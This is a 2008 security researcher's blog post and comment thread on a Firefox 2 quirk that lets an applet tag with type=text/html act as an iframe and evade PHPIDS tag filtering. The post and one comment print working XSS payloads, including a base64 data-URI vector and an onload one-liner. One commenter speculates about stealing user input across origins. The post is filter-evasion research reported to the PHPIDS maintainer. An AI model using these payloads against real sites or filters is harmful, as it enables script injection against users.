Skip to content

Firefox applet fun

I’ve been hacking the PHPIDS recently and I wanted a pure XSS vector not just script execution, I decided to experiment with the applet tag because it sneaks past the malicious tag detection. I thought to myself I wonder if it accepts the type attribute like the object tag does….

<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3N
jcmlwdD4" type=text/html>

That works it executes the base64 encoded string as HTML! It doesn’t stop there though :) 

<applet src="http://www.businessinfo.co.uk" type=text/html>

The applet tag even acts like a iframe :D

Share and Enjoy:
  • Digg
  • del.icio.us
  • Slashdot
  • StumbleUpon

Comments 13

  1. ehmo wrote:

    hey man, nice find.

    Posted 20 May 2008 at 10:49 am
  2. Gareth Heyes wrote:

    @ehmo

    Thx, it was fun to find :)

    Posted 20 May 2008 at 11:17 am
  3. Gareth Heyes wrote:

    Here’s a shortened XSS vector:-
    <applet/src/type=text/html onload=alert(1)

    Posted 20 May 2008 at 12:07 pm
  4. daniel wrote:

    My only issue would be sites that use strict XHTML, this would be rendered useless, no?

    Posted 20 May 2008 at 12:50 pm
  5. Gareth Heyes wrote:

    @daniel

    I ran a test in strict html and it still seemed to work

    Posted 20 May 2008 at 12:56 pm
  6. daniel wrote:

    interesting, damn good find then sir!

    Posted 20 May 2008 at 1:37 pm
  7. Alex wrote:

    Which version of Firefox did you use ? I tried it with Firefox 3 RC1 and it didn’t work.

    Posted 20 May 2008 at 2:47 pm
  8. Gareth Heyes wrote:

    @Alex

    Not tried with beta but it works with latest FF2

    Posted 20 May 2008 at 2:50 pm
  9. Alex wrote:

    I’ve tested it with the latest FF2. Now it works.
    It’s time to try accessing any property or value from outside that “iframe”. Maybe we can bypass the same origin policy and steal userinput from within this “iframe”.

    Posted 20 May 2008 at 6:50 pm
  10. Gareth Heyes wrote:

    @Alex

    Yeah I thought that might be possible but it appears that the properties can’t be accessed using “this” and the frames array. However if you can prove me wrong then I’d be very interested on how to do it :)

    Posted 20 May 2008 at 6:57 pm
  11. Alex wrote:

    I’ve tried some code to access data from within this “iframe”, but you’re right so far. ’til now I didn’t manage to get around the protection.

    Posted 20 May 2008 at 10:16 pm
  12. .mario wrote:

    Nice stuff Gareth - finally a “real” XSS again ;) Has been a pretty long time. The issues are fixed in the trunk - 0.4.8 as soon as I return from OWASP Europe.

    Posted 21 May 2008 at 9:19 am
  13. Gareth Heyes wrote:

    @.mario

    Thx, I knew about the applet tag insert for a while but I didn’t think it was exploitable. It was good fun to find :D good luck with the conference

    Posted 21 May 2008 at 9:59 am

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam